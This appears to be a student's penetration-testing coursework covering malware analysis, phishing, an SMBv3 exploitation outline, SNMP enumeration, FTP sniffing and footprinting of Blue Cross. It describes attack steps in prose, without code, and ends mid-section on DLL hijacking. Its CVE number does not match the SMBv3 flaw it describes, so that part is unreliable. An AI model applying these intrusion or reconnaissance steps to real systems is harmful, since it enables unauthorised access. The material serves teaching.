Task 1(a): Static and Dynamic Malware Analysis

Static Malware Analysis

Static analysis involves examining the suspicious file without executing it. The goal is to understand the
structure, functionality, and potential malicious traits of the file.

1. File Identification and Metadata Extraction:

o File Type: Determine the file type using tools like file (Linux) or TrID (Windows).

o Hashes: Calculate the file hashes (MD5, SHA-1, SHA-256) for integrity verification and
comparison against known malware databases.

o File Properties: Extract file properties such as creation/modification dates, author, and
digital signatures using tools like exiftool.

2. Disassembly and Decompilation:

o Disassembly: Use tools like IDA Pro or Ghidra to convert the binary code into assembly
language. This helps in understanding the program flow and identifying potentially
malicious code segments.

o Decompilation: Use decompilers like JD-GUI (for Java), dotPeek (for .NET), or Hopper
(for macOS and iOS) to convert the binary code back into higher-level source code.

3. String Analysis:

o Use tools like strings (Linux) or BinText (Windows) to extract human-readable strings
from the binary. Look for suspicious URLs, IP addresses, file paths, or commands.

4. Static Code Analysis:

o Analyze the extracted code for patterns and signatures of known malware, such as
obfuscation techniques, encryption algorithms, and suspicious API calls.

5. Metadata Analysis:

o Analyze file metadata, including version information, compiler details, and resource
identifiers, to understand file origin, purpose, and potential association with known
malware families or threat actors.

6. Behavioral Profiling:

o Create a behavioral profile using static characteristics like file size, entropy, and section
headers to detect deviations from normal software behavior and potential malicious
intent.

7. Code Obfuscation Detection:

o This study examines code obfuscation techniques, such as string encryption, dead code
insertion, code packing, and anti-debugging mechanisms, used to conceal malicious
intent or evade detection by security tools.
Dynamic Malware Analysis

Dynamic analysis involves executing the suspicious file in a controlled environment to observe its
behavior in real-time. This helps in understanding the file's actions and potential impact on the system.

1. Setting Up a Sandbox Environment:

o Use virtual machines (VMware, VirtualBox) or sandboxing solutions (Cuckoo Sandbox,

Any.Run) to create an isolated and controlled environment for safe execution of the
malware.

2. Behavior Monitoring:

o Process Monitoring: Use tools like Process Monitor (ProcMon) to track process creation,
termination, and modification.

o File System Monitoring: Observe changes to the file system using tools like Process
Monitor or Sysinternals Suite.

o Registry Monitoring: Track registry changes using tools like Regshot or Process Monitor.

3. Network Activity Analysis:

o Monitor network traffic generated by the malware using tools like Wireshark or
tcpdump. Look for suspicious connections, data exfiltration attempts, or communication
with command-and-control (C2) servers.

4. Memory Analysis:

o Analyze the memory usage and modifications using tools like Volatility or Memoryze.
Look for injected code, hidden processes, or other anomalies.

5. API Call Analysis:

o Monitor and analyze the API calls made by the malware using tools like API Monitor or
Sysinternals Process Explorer. Identify suspicious or unauthorized actions.

6. Behavioral Analysis:

o Observe the overall behavior of the malware, including any attempts to evade detection,
persistence mechanisms, and interactions with other system components.

Task 1(b): Types of Attacks and Detailed Descriptions

1. Spear Phishing Attack

Spear phishing is a highly targeted form of phishing where attackers craft their messages specifically for a
particular individual or organization to increase the likelihood of success. Unlike regular phishing attacks,
which are sent to a large number of potential victims, spear phishing attacks are personalized and often
use personal information about the target to make the emails appear legitimate and convincing.

Characteristics:

 Personalization: The attacker uses details such as the recipient's name, position, and recent
activities to create a convincing message.

 Trusted Sender: The email appears to come from a known or trusted source, such as a colleague,
business partner, or, in this case, a client.

 Urgency and Relevance: The message often includes urgent or relevant information to prompt
quick action without much scrutiny.

Example Scenario: In this scenario, the finance manager received an email that appeared to be from a
trusted client. The email included a malicious attachment labeled as payment_invoice.pdf.exe. The use
of the client's name and the financial context made the email seem legitimate, leading the finance
manager to download and open the attachment, thereby potentially compromising the system.

2. Social Engineering Attack

Social engineering attacks rely on manipulating individuals into performing actions or divulging
confidential information by exploiting human psychology. These attacks often bypass technical security
measures by targeting the human element within an organization. Social engineering can take various
forms, including pretexting, baiting, quid pro quo, and tailgating.

Types of Social Engineering:

 Pretexting: The attacker creates a fabricated scenario to obtain information or gain access. For
instance, pretending to be a help desk technician asking for login credentials.

 Baiting: The attacker entices the victim with a promise of a reward or curiosity, such as leaving
an infected USB drive in a public place labeled as "confidential."

 Quid Pro Quo: The attacker offers a service or benefit in exchange for information, like
pretending to be an IT service offering to fix an issue if the victim provides login details.

 Tailgating: The attacker follows an authorized person into a restricted area by exploiting social
norms, such as holding the door open.

Example Scenario: In the context of the finance manager, the attacker used psychological manipulation
to persuade the manager to download and open the malicious file. By creating a scenario where the
email seemed to be from a real client with an urgent invoice, the attacker leveraged the manager's trust
and sense of duty to act quickly on financial matters.

3. Malware Attack

A malware attack involves the delivery and execution of malicious software designed to disrupt, damage,
or gain unauthorized access to computer systems. Malware can come in various forms, including viruses,
trojans, ransomware, spyware, and worms. The delivery methods can vary, such as through email
attachments, infected websites, or removable media.

Types of Malware:

 Viruses: Malicious code that attaches itself to legitimate programs and spreads to other
programs and files when executed.

 Trojans: Malware disguised as legitimate software, which, once executed, can perform
unauthorized actions such as data theft or system compromise.

 Ransomware: Encrypts the victim's data and demands a ransom for the decryption key.

 Spyware: Secretly monitors and collects user information without their knowledge.

 Worms: Self-replicating malware that spreads across networks without user intervention.

Example Scenario: In this scenario, the finance manager downloaded a file named
payment_invoice.pdf.exe. The file's name was designed to appear as a legitimate PDF document, but
the .exe extension indicated that it was an executable file. Once opened, the file likely executed
malicious code, which could install a virus, trojan, or other types of malware, compromising the
manager's computer and potentially spreading to the entire network.

These detailed descriptions highlight the nature and techniques used in spear phishing, social
engineering, and malware attacks, illustrating how the finance manager was targeted and the potential
impact on the organization's security.
Task 2(a): CVE-2019-20183

CVE-2019-20183 is a critical buffer overflow vulnerability in the Server Message Block version 3
(SMBv3) protocol's compression mechanism. This flaw can be exploited by sending a specially crafted
packet to an SMBv3 server or client, leading to remote code execution or system crashes. Affecting
Windows 10 and Windows Server versions 1903 and 1909, this vulnerability requires no
authentication, making it particularly dangerous as it allows attackers to take control of or disrupt
vulnerable systems.

Exploiting CVE-2019-20183 Using Crafted Malicious SMB Packets and Network Traffic Manipulation

Crafting Malicious SMB Packets

Crafting malicious packets involves creating specially designed packets to exploit the buffer overflow
vulnerability in the SMBv3 compression mechanism. This process requires a thorough understanding
of the protocol and the specifics of the vulnerability.

Steps:

1. Understand the Vulnerability:

o Deep dive into how SMBv3 handles compression and identify the exact flaw. Research
technical documentation and any available exploit details to understand how to
trigger the buffer overflow.

o The goal is to create a packet that, when processed by the SMBv3 service, will
overflow the buffer and allow arbitrary code execution.

2. Design Malicious Packets:

o Design packets that exploit the vulnerability. These packets need to be crafted in a way
that they cause the SMBv3 service to process compressed data incorrectly, leading to a
buffer overflow.

o Example techniques include carefully constructing the payload to overflow the buffer
and insert shellcode or other malicious payloads that will be executed.

3. Deploy the Exploit:

o Send the crafted packets to the target SMBv3 service. This can be done through
various methods such as direct network transmission or embedding the payload in
regular SMB traffic.

o The malicious packet must be designed to avoid detection by security systems and
trigger the vulnerability effectively.

4. Trigger Code Execution:

o Once the target processes the malicious packet, the buffer overflow should be
triggered, allowing the payload to be executed.
 o This can potentially give the attacker control over the system, depending on the
payload delivered.

Techniques for Crafting Malicious Packets:

 Protocol Manipulation: Understand and manipulate the SMBv3 protocol to create packets that
exploit the specific vulnerability.

 Payload Construction: Design the payload to be executed after the buffer overflow is triggered.

 Timing and Sequence: Ensure packets are sent in the correct sequence and timing to exploit
the vulnerability without detection.

Network Traffic Manipulation

Network traffic manipulation involves intercepting and modifying legitimate SMB traffic to exploit the
vulnerability. This technique leverages man-in-the-middle (MITM) attacks and packet injection.

Steps:

1. Intercept Network Traffic:

o Capture SMB traffic between clients and servers using network sniffing techniques.
This requires positioning the attacker’s system in the path of the communication, often
through ARP spoofing or DNS poisoning.

o Tools and methods include ARP spoofing to redirect traffic through the attacker’s
system.

2. Analyze SMB Traffic:

o Examine the captured traffic to understand the normal flow of SMB communication.
Identify SMBv3 packets and analyze their structure.

o Look for patterns and identify where the vulnerable compression mechanism is used.

3. Modify Intercepted Packets:

o Alter the intercepted packets to include malicious payloads designed to exploit the
SMBv3 vulnerability.

o This involves editing the payload of SMB packets in transit to inject the crafted
malicious data that triggers the buffer overflow.

4. Re-inject Malicious Packets:

o Send the modified packets back to the network, targeting the vulnerable SMBv3
service. Ensure the packets appear legitimate to avoid detection.

o Use techniques to maintain the integrity and flow of normal communication while
injecting malicious packets.

5. Trigger the Vulnerability:

 o When the modified packets are processed by the SMBv3 service, they should trigger
the buffer overflow, allowing code execution.

o Monitor the target to confirm the exploitation and gain control over the system.

Techniques for Network Traffic Manipulation:

 Man-in-the-Middle Attacks: Position the attacker between the client and server to intercept
and modify traffic.

 Packet Injection: Inject malicious packets into the stream of legitimate SMB traffic.

 Traffic Analysis: Continuously analyze intercepted traffic to ensure modifications are effective
and undetected.

Additional Tools for Network Traffic Manipulation:

 Wireshark: For capturing and analyzing SMB traffic.

 Ettercap: For conducting MITM attacks and packet manipulation.

 Scapy: For creating and modifying packets on the fly.

 Responder: For intercepting and manipulating SMB authentication traffic.

 NTLMRelayX (part of Impacket): For relaying and manipulating NTLM authentication traffic.

By focusing on these detailed techniques—crafting malicious SMB packets and manipulating network
traffic—you can exploit the CVE-2019-20183 vulnerability with a thorough understanding of the
SMBv3 protocol and sophisticated packet manipulation strategies.

Other ways to exploit CVE

Reverse Engineering and Custom Payloads:

 Description: Reverse engineer the SMBv3 protocol implementation to understand the

vulnerability better and create custom payloads tailored to exploit it.

SMB Relay Attack:

 Description: Exploit the vulnerability by relaying SMB authentication traffic to another target
system.

Memory Corruption Techniques:

 Description: Use advanced memory corruption techniques to craft payloads that exploit the
buffer overflow in SMBv3.
Network Segmentation, Monitoring, Access Controls, and SNMP Restriction

Description:

 These combined measures aim to limit exposure to vulnerabilities, detect malicious activities,
and enforce strict access policies to safeguard network resources.

Implementation:

Network Design:

 Step 1: Identify critical systems and sensitive data within the network.

 Step 2: Create isolated network segments for these critical systems using VLANs, firewalls, or
physical separation.

 Step 3: Implement strict access controls to limit communication between segments, allowing
only necessary traffic.

 Step 4: Regularly review and update network segmentation to adapt to changing security
needs.

Network Monitoring:

 Step 1: Deploy network monitoring tools and systems to capture and analyze network traffic.

 Step 2: Set up alerts for unusual traffic patterns, such as unexpected SMBv3 or SNMP
activities, malformed packets, or unauthorized access attempts.

 Step 3: Investigate alerts promptly to identify potential exploitation attempts and take
corrective actions.

 Step 4: Maintain logs and records of network traffic for forensic analysis and compliance
purposes.

Access Control Policies:

 Step 1: Define and enforce strict access control policies for all network services, including
SMBv3 and SNMP.

 Step 2: Use strong authentication mechanisms, such as multi-factor authentication (MFA), to

verify user identities.

 Step 3: Limit the number of users with administrative privileges and regularly review their
access rights.

 Step 4: Implement role-based access controls (RBAC) to ensure users have the minimum
necessary permissions.

Restrict SNMP Access:

 Step 1: Configure firewalls and access control lists (ACLs) to restrict SNMP traffic to specific IP
addresses or subnets.
  Step 2: Use MAC address filtering to allow only trusted devices to communicate with SNMP
services.

 Step 3: Regularly audit SNMP configurations to ensure they align with security policies.

 Step 4: Implement SNMP views to limit the information accessible through SNMP queries.

By integrating these measures, organizations can enhance their security posture, effectively mitigate
risks, and protect their network resources from exploitation attempts.

Task 2(b): Techniques for Enumerating the Service Running on Port 161
Port 161 is used by the Simple Network Management Protocol (SNMP), which is widely employed for
network management. Enumerating this service involves gathering information about network devices
using SNMP queries.

Techniques for SNMP Enumeration

1. Network Scanning to Discover Hosts

o Before focusing on SNMP enumeration, identify active devices in the network.

o Tools:

 Nmap: Perform a network scan to discover active hosts and open ports.

 Bettercap: Can also be used to discover hosts within a local network.

 Nbtscan: Useful for discovering hosts on NetBIOS network.

 Hping3: Another powerful tool for network discovery.

2. Port Scanning for Open Ports

 Identify devices with port 161 open to ensure they are running SNMP services.

 Tools:

o Nmap: Again, useful for identifying open ports.

o Bettercap: Can identify open ports during its scans.

3. SNMP Version Identification

 Determine the SNMP version in use (v1, v2c, v3), as this affects the enumeration approach.

 Tools:

o Nmap: Use Nmap scripts to detect SNMP version.

o Onesixtyone: A fast SNMP scanner that can help identify SNMP versions.

4. Importance of OIDs and Community Strings:

To successfully enumerate information using SNMP, you need:

OID (Object Identifier):

OIDs are unique identifiers used to specify managed objects in an SNMP-enabled device.
Each OID points to a specific piece of information, such as system description, device interfaces, or IP
addresses.

Knowing the correct OIDs allows you to query specific data points, making it possible to gather detailed
and relevant information from the SNMP agent.

o Community String:

Community strings act like passwords for accessing information on SNMP devices.

They determine the level of access you have; "public" might give read-only access, while
"private" or custom strings might offer read-write access.

Without the correct community string, SNMP requests will be denied, making it crucial
to know or guess the correct string to retrieve data.

 Tools:

o Snmpwalk: Retrieves data from SNMP agents using known community strings.

o Snmpcheck: Another tool for gathering extensive information from SNMP devices.

 Example:

Detailed Steps for SNMP Enumeration

1. Identify the SNMP Version

o Use Nmap with the snmp-info script or Onesixtyone to determine the SNMP version in
use. This influences the enumeration strategy as SNMP v3 offers more security features
compared to v1 and v2c.

o Explanation: Identifying the SNMP version helps in understanding the security level
(SNMPv1 and SNMPv2c are less secure compared to SNMPv3). Retrieving the system
OID gives a starting point for further queries.

2. Retrieve System Information

o Use Snmpwalk to query the SNMP agent with common OIDs to retrieve information
such as device description, system name, and contact details.

o Steps:  Document details such as system name, location, and contact information.

o  Identify potential vulnerabilities based on retrieved data, such as outdated firmware

or weak community strings.

o Explanation: The collected data provides insights into the network devices, their
configurations, and potential vulnerabilities. This information is critical for assessing the
network's security posture and identifying areas that need attention.

Information Obtained from SNMP Enumeration

 System Description and Operating System:

 o By retrieving the sysDescr OID, you can gather information about the network device's
description and operating system.

 Device Type and Vendor Information:

o SNMP can reveal the device type (e.g., router, switch, printer) and vendor information,
aiding in identifying specific vulnerabilities.

 Network Configuration Details:

o Information such as network interfaces, IP addresses, and routing details can be

obtained, which may be useful for further network analysis.

o Important OIDs:

 .1.3.6.1.2.1.1.1: sysDescr, provides a description of the device.

 .1.3.6.1.2.1.1.5: sysName, provides the system name.

3. Analyze SNMP Responses

• Assess the data that was obtained in order to find any potential weaknesses. Examples include out-
of-date software versions, community strings that are set by default, and sensitive configuration
information.

4. Advanced Enumeration Techniques

 Brute Force Community Strings:

o Tools: Medusa, Hydra

o Note: While not ethical or legal without permission, understanding the concept helps in
defensive measures.

Utilize Multiple Enumeration Tools

 Employ different tools to cross-verify and ensure comprehensive enumeration.

 Tools: Snmpwalk, Snmpget, Onesixyone, Nmap.

 SNMP Walk:
 o Use snmpwalk to enumerate all OIDs and gather extensive information about the
device.

Countermeasures for SNMP Enumeration and Exploitation

Port 161, used by the Simple Network Management Protocol (SNMP), is a crucial point for network
management. However, it is also a potential target for attackers. To protect SNMP services from
enumeration and exploitation, several detailed countermeasures should be implemented:

1. Use Strong Community Strings

o Description: Replace default community strings (like "public" and "private") with strong,
complex strings.

o Details: Community strings act as passwords for accessing SNMP information. Weak or
default strings can be easily guessed or brute-forced, allowing unauthorized access.

o Implementation:

 Complexity: Create community strings with a mix of uppercase and lowercase

letters, numbers, and special characters (e.g., "4lPh@NuM3r!c$tr1ng").

 Length: Ensure the strings are at least 12 characters long to increase resistance
to brute-force attacks.

 Rotation: Regularly change community strings to reduce the risk of

compromised credentials being used.

 Example: Instead of using "public" or "private", use a string like "G&8jR4t^X1kL!

9".

2. Regularly Update SNMP Software and Devices

 Description: Keep SNMP software and network devices updated with the latest patches and
firmware.

 Details: Regular updates protect against known vulnerabilities and exploits.

 Implementation:

o Patch Management:

 Establish a routine for checking and applying updates to SNMP software and
firmware.

 Monitor vendor security advisories for new vulnerabilities and patches.

o Automation: Use automated tools to manage and deploy updates across the network.

3. Monitor SNMP Traffic, Implement SNMP Views, and Restrict SNMP Access
Description: Combine monitoring SNMP traffic, implementing SNMP views, and restricting SNMP
access to enhance security and control over SNMP-enabled devices.

Details: Monitoring SNMP traffic can detect unauthorized access attempts in real-time, while SNMP
views restrict access to specific parts of the MIB (Management Information Base). Additionally,
restricting SNMP access ensures that only authorized users and devices can interact with SNMP
services.

Implementation:

1. Monitor SNMP Traffic:

o Tools: Use network monitoring tools (e.g., Wireshark, SolarWinds) to log and analyze
SNMP traffic.

o Alerting:

 Set up alerts for unusual SNMP queries or traffic patterns.

 Example: Alert if multiple failed SNMP requests are detected, indicating a

potential brute-force attack.

2. Implement SNMP Views:

o Configuration: Define SNMP views to control which OIDs can be queried or modified,
limiting the information available to users.

o Segmentation: Create different views for different user roles, ensuring least privilege
access.

3. Restrict SNMP Access:

o Network Restrictions:

 Limit SNMP access to specific IP addresses or subnets.

 Configure firewall rules to allow SNMP traffic only from trusted sources.

o MAC Address Filtering: Restrict SNMP access to devices with specific MAC addresses.

o Access Control Lists (ACLs):

 Define ACLs on network devices to restrict SNMP access based on IP addresses

and other criteria.

 Example: Only allow SNMP requests from the network management station's
IP address.

o Implementation Steps:

 Configure SNMP community strings with strong, unique passwords.

 Example: Replace default community strings like "public" with complex,

unique strings.
Task 3(a): Techniques for Identifying the OS Version

Identifying the operating system version during a penetration test involves several key stages:
Enumeration, Exploitation, and Post-Exploitation. Each stage employs specific techniques to gather
information, exploit vulnerabilities, and verify details about the target system's OS.

1. Enumeration

Techniques:

1. Network Scanning:
 o Objective: Discover active hosts and their IP addresses within the network.

o Approach: Perform network scans to detect live devices. Techniques include sending
ICMP echo requests (ping) or TCP/UDP probes to identify which IP addresses are in use.

2. Port Scanning:

o Objective: Identify open ports on the target devices to determine which services are
running.

o Approach: Conduct thorough port scans to enumerate open ports and determine the
types of services associated with those ports. This includes scanning well-known ports
(0-1023) and higher ports (1024-65535) for additional services.

3. Service Enumeration:

o Objective: Gather detailed information about services running on open ports.

o Approach: Examine service banners and use protocol-specific queries to identify the
software and version in use. Techniques involve banner grabbing, where responses from
services are captured and analyzed to extract version information.

Importance of Enumeration:

 Why: Enumeration provides a comprehensive understanding of the network, identifying

potential targets and entry points.

 How: Detailed scanning reveals the attack surface, highlighting vulnerable services that can be
exploited. This stage is crucial for mapping the network topology and understanding the security
landscape.

2. Exploitation

Techniques:

1. Vulnerability Scanning:

o Objective: Identify vulnerabilities in discovered services.

o Approach: Analyze service banners and cross-reference with known vulnerabilities

databases. This can include checking for outdated software versions and known exploits
that can be leveraged.

2. Exploit Development/Selection:

o Objective: Develop or select appropriate exploits to target identified vulnerabilities.

o Approach: Choose or create exploits tailored to the specific vulnerabilities discovered.

This involves understanding the exploit code, modifying it if necessary, and executing it
to gain access.

3. Brute Force Attacks:

 o Objective: Gain access by cracking user credentials.

o Approach: Systematically attempt various username and password combinations to gain

unauthorized access. This can involve dictionary attacks, where a list of common
passwords is tried, or more sophisticated approaches like credential stuffing.

Importance of Exploitation:

 Why: Successfully exploiting vulnerabilities allows penetration testers to gain initial access to the
target system.

 How: Using precise exploits or brute force techniques to penetrate defenses and establish a
foothold. This stage transforms theoretical vulnerabilities into practical entry points.

3. Post-Exploitation

Techniques:

1. Maintaining Access:

o Objective: Ensure continued access to the compromised system.

o Approach: Implement backdoors or other persistence mechanisms. This can include

modifying system scripts to re-establish a connection upon reboot or using legitimate
features (like scheduled tasks) for persistence.

2. Privilege Escalation:

o Objective: Increase privileges to gain complete control over the system.

o Approach: Exploit local vulnerabilities to escalate privileges. This can involve exploiting
misconfigurations, known local exploits, or weaknesses in the operating system to gain
administrative or root access.

3. OS Identification:

o Objective: Accurately identify the operating system version.

o Approach: Execute specific commands to reveal detailed OS information. For instance, in

Windows, using system information commands; in Linux, querying the kernel and OS
release files.

Commands for OS Identification:

 Windows:

o Objective: Retrieve comprehensive system information.

o Approach: Execute commands that provide system version, architecture, and other
details.

o Command: systeminfo reveals Windows version, build number, service packs, and more.
 o Command: ver displays the OS version.

 Linux:

o Objective: Get kernel and OS version details.

o Approach: Use commands to query the kernel and OS release information.

o Command: uname -a provides kernel version, hostname, and other details.

o Command: cat /etc/os-release displays OS distribution and version.

Importance of Post-Exploitation:

 Why: Post-exploitation techniques provide deeper access and understanding of the

compromised system.

 How: By executing specific commands, detailed OS information is retrieved, aiding in further

actions. This stage solidifies control over the system and allows for extensive data gathering and
analysis.

Summary

Identifying the OS version is a multi-stage process that requires careful enumeration, exploitation, and
post-exploitation techniques. Emphasizing techniques over tools ensures a versatile approach, adaptable
to various scenarios and environments. Understanding the network, identifying vulnerabilities, and
verifying system details through precise commands and methodologies are crucial for effective
penetration testing and OS identification. Each stage builds on the previous one, from mapping the
network to exploiting vulnerabilities and finally confirming the OS version through detailed post-
exploitation analysis.

Identifying the OS version without traditional enumeration techniques

Identifying the OS version without traditional enumeration techniques involves a mix of passive
observation, leveraging existing access, social engineering, and utilizing third-party services. Passive
observation includes methods like network sniffing to capture traffic and analyze OS-specific signatures,
or fingerprinting HTTP headers to deduce OS information from User-Agent strings. Leveraging existing
access focuses on exploiting application-specific information or analyzing detailed error messages that
disclose system paths and versions. Social engineering techniques manipulate human behavior through
phishing campaigns or impersonation tactics to extract OS details. Utilizing third-party services involves
accessing cloud management interfaces or remote monitoring tools to retrieve OS information from
legitimate sources. These alternative methods provide non-intrusive, creative ways to gather OS details,
combining technical analysis, human interaction, and legitimate service usage to create a comprehensive
strategy for OS identification.

TASK3(b)

Performing Packet Sniffing Pentest on an FTP Server Using Wireshark

Packet sniffing on an FTP server involves capturing and analyzing the network traffic to and from the
server. This process helps identify potential security vulnerabilities, such as unencrypted credentials or
sensitive data being transmitted. Here’s a detailed step-by-step guide:

1. Prepare the Environment

Ensure that Wireshark is installed on your Kali Linux machine. Wireshark is a powerful network protocol
analyzer that allows you to capture and interactively browse the traffic running on a computer network.

2. Identify the Target

Before starting packet sniffing, you need to identify the target FTP server and its IP address within the
network. This can be done through network scanning using tools like Nmap. Network scanning helps you
understand the network layout and locate devices that are running FTP services.

3. Start Packet Capture

 Launch Wireshark: Open Wireshark from the applications menu or via terminal.

 Select the Network Interface: Choose the network interface that is connected to the target
network (e.g., eth0 or wlan0). Selecting the correct interface is crucial for capturing the right
traffic.

 Apply Capture Filter: To focus on FTP traffic, apply a capture filter for port 21, which is the
default port for FTP. This filter ensures that Wireshark captures only the traffic related to FTP,
reducing the amount of data to sift through and making analysis easier.

4. Analyze FTP Traffic

 Start Capturing: Begin the packet capture by clicking the start capture button. Wireshark will
start capturing all traffic on the specified interface that matches the capture filter.

 Monitor Login Attempts: Look for packets that include the FTP login sequence. In FTP,
credentials are often transmitted in clear text, so you should see commands like USER (followed
by the username) and PASS (followed by the password) in the packet data.

 Inspect Data Transmission: Examine the captured packets to see if any sensitive data is being
transmitted in clear text. This includes files being uploaded or downloaded, directory listings,
and other commands.

5. Extract Useful Information

  Follow TCP Stream: To get a clear view of the conversation between the FTP client and server,
you can use the "Follow TCP Stream" feature in Wireshark. This reconstructs the entire
conversation, making it easier to read and analyze.

 Identify Unencrypted Credentials: Look for USER and PASS commands in the TCP stream. If the
FTP server is not using encryption (e.g., FTPS), these credentials will be in plain text.

6. Save and Analyze Capture

 Save the Capture: Once you have captured enough data, save the capture file for further
analysis. This allows you to revisit the data and use additional tools or techniques to extract
more information.

 Detailed Analysis: Use Wireshark’s built-in tools to analyze the captured data further. Apply
display filters to narrow down interesting packets and focus on specific types of traffic or events.

7. Correlate with Other Tools

While Wireshark is the primary tool for packet sniffing, other tools can complement the analysis:

 Tcpdump: A command-line packet analyzer that can be used to capture packets for later analysis
in Wireshark.

 Ettercap: Useful for ARP poisoning and capturing traffic on switched networks.

 dsniff: A suite of tools for network auditing and penetration testing, including tools for capturing
FTP credentials.

8. Identify Potential Vulnerabilities

 Unencrypted Data: Check if any sensitive information or credentials are transmitted in plain text.
This is a significant security risk and indicates a need for encryption, such as FTPS or SFTP.

 Configuration Weaknesses: Look for signs of weak or default configurations on the FTP server,
such as allowing anonymous login or using default passwords.

 Traffic Patterns: Analyze the captured traffic for unusual patterns that might indicate
unauthorized access attempts or data exfiltration. For example, repeated login attempts could
suggest a brute-force attack, while unexpected data transfers might indicate data leakage.

Conclusion

Packet sniffing using Wireshark is a powerful method for analyzing the security of an FTP server. By
capturing and examining the network traffic, you can identify vulnerabilities such as unencrypted
credentials and sensitive data being transmitted in clear text. This detailed analysis helps in
understanding the security posture of the FTP server and implementing necessary measures to secure it.
While Wireshark is the primary tool for this task, integrating it with other tools like Tcpdump, Ettercap,
and dsniff can provide a comprehensive view of network security
Task 4
(b) Methods for Tracking and Monitoring Hospital's Online Reputation

1. Web Crawling and Data Mining

 Description: Automated crawling of websites, forums, and social media platforms to collect and
analyze mentions of the hospital.

 Techniques:

o Develop custom web crawlers to scan various online platforms for specific keywords
related to the hospital.

o Use data mining techniques to extract relevant information from collected data.

o Perform regular analysis to detect changes and trends in online mentions.

 Implementation:

o Set up and configure web crawlers to scan the internet continuously for mentions of the
hospital.

o Use machine learning algorithms to analyze the data and identify patterns or anomalies.

o Regularly review and interpret the results to understand public perception and emerging
threats.

2. Dark Web Monitoring

 Description: Monitor dark web forums and marketplaces for discussions or data related to the
hospital.

 Techniques:

o Use specialized tools to access and monitor dark web sites.

o Track mentions of the hospital, its staff, and any potentially leaked information.

o Analyze dark web activity to identify potential threats or breaches.

 Implementation:

o Employ dark web monitoring services or set up custom scripts to track relevant
keywords.

o Regularly scan for data dumps, credentials, and other sensitive information that could
indicate a security breach.
 o Collaborate with law enforcement and cybersecurity experts to respond to any
findings.

3. Threat Intelligence Gathering

 Description: Collect and analyze threat intelligence related to the hospital from various sources.

 Techniques:

o Subscribe to threat intelligence feeds that provide information on emerging threats

targeting healthcare organizations.

o Analyze threat intelligence reports to identify potential vulnerabilities and attack vectors.

o Use threat intelligence to inform security policies and incident response plans.

 Implementation:

o Integrate threat intelligence feeds into your security operations center (SOC) for
continuous monitoring.

o Regularly review threat intelligence reports and adjust security measures accordingly.

o Conduct threat hunting activities based on the latest intelligence to proactively identify
and mitigate risks.

4. Monitoring for Data Breaches

 Description: Detect and respond to data breaches involving the hospital's information.

 Techniques:

o Use data breach detection services to monitor for signs of compromised data.

o Analyze breach data to understand the scope and impact of the incident.

o Implement measures to contain and remediate the breach.

 Implementation:

o Set up alerts for any breaches involving the hospital’s data, including patient records and
sensitive information.

o Conduct a forensic analysis to determine the cause and impact of the breach.

o Notify affected parties and comply with regulatory requirements for breach disclosure.

5. Brand Abuse Monitoring

 Description: Track and mitigate instances of brand abuse, such as fake websites and phishing
campaigns.

 Techniques:

o Monitor the internet for websites and domains that mimic the hospital’s brand.
 o Analyze phishing emails and other malicious communications targeting the hospital’s
patients and staff.

o Take down fraudulent websites and mitigate phishing campaigns.

 Implementation:

o Use brand monitoring services to detect and report instances of brand abuse.

o Work with internet service providers (ISPs) and domain registrars to remove fraudulent
websites.

o Educate patients and staff about phishing threats and how to recognize them.

6. Security Information and Event Management (SIEM)

 Description: Use SIEM systems to collect and analyze security events related to online reputation
threats.

 Techniques:

o Integrate various data sources into the SIEM for comprehensive monitoring.

o Use correlation rules to detect patterns indicative of reputation threats, such as

coordinated social media attacks or data leaks.

o Generate alerts and reports to respond to potential reputation threats in real-time.

 Implementation:

o Configure the SIEM to include data from social media, review sites, threat intelligence
feeds, and other relevant sources.

o Develop and tune correlation rules to detect suspicious activity related to the hospital’s
reputation.

o Use the SIEM’s reporting capabilities to provide regular updates on potential reputation
threats.

By employing these cybersecurity-related methods, the hospital can proactively monitor and protect its
online reputation from various threats, ensuring a secure and trustworthy presence in the digital space.

To effectively footprint Blue Cross's network infrastructure, several tools and methods can be employed.
Here is a detailed breakdown of each tool and its use in the steps of footprinting:

WHOIS WHOIS is a query and response protocol used to obtain information about the ownership and
registration details of domain names. By querying WHOIS databases, you can gather information about
Blue Cross's domain registration, including the registrar, registration dates, and contact information. This
information helps identify the IP addresses associated with the domain and any related subdomains.
WHOIS data can also provide insights into the organization's public-facing assets and administrative
contacts.
Nslookup and Dig Nslookup and Dig are command-line tools used for querying DNS records. These tools
can help retrieve various DNS records such as A, MX, NS, and TXT records. By using Nslookup or Dig, you
can discover subdomains, mail servers, name servers, and other DNS-related information associated with
Blue Cross's domain. This information is crucial for mapping the domain structure and identifying
potential entry points for further analysis.

Nmap Nmap is a powerful network scanning tool used to identify live hosts, open ports, and services
running on those ports. By conducting a comprehensive Nmap scan, you can enumerate active devices
within Blue Cross's network and gather details about the services they are running. Nmap can also
detect the operating system and version of the target devices, which aids in identifying potential
vulnerabilities and understanding the network's configuration.

Traceroute Traceroute is a network diagnostic tool used to trace the path packets take from the source
to the destination. By performing a traceroute to Blue Cross's IP addresses, you can map the network
path and identify intermediate devices such as routers and gateways. This information helps in
understanding the network topology, identifying potential choke points, and discovering network
infrastructure components.

Shodan and Censys Shodan and Censys are search engines that index information about internet-
connected devices and services. By querying these platforms, you can find exposed devices, services,
and potential vulnerabilities associated with Blue Cross's IP addresses. Shodan and Censys provide
detailed information about the device type, operating system, and open ports, helping to identify
misconfigurations and exposed services that could be targeted.

Maltego Maltego is a data visualization and analysis tool used to map and analyze relationships between
entities. By using Maltego, you can create a visual representation of Blue Cross's network infrastructure,
including domains, IP addresses, email addresses, and social media profiles. Maltego helps in identifying
connections and dependencies between different entities, providing a holistic view of the network's
structure and potential attack vectors.

Recon-ng and theHarvester Recon-ng and theHarvester are open-source reconnaissance tools used for
gathering information from multiple sources. These tools can collect data from search engines, social
media platforms, and public databases to build a comprehensive profile of Blue Cross's online presence.
By using these tools, you can identify email addresses, employee details, and additional subdomains
associated with Blue Cross, aiding in the footprinting process.

Google Dorks Google Dorks involve using advanced search queries to find specific information indexed
by search engines. By crafting targeted search queries, you can discover sensitive information,
misconfigurations, and exposed files related to Blue Cross's network infrastructure. Google Dorks can
help verify findings from other tools and uncover additional data that may not be easily accessible.

By utilizing these tools and methods, a detailed and comprehensive footprint of Blue Cross's network
infrastructure can be built. This multi-tool approach ensures a thorough understanding of the network's
assets, potential vulnerabilities, and overall security posture.
Task 4(a): Exploiting DLL Hijacking Vulnerability to Gain Administrative Privileges on Windows 10

1. DLL Hijacking

DLL Hijacking occurs when an application loads a malicious DLL instead of the legitimate one. Here’s how
it can be done:

Steps:

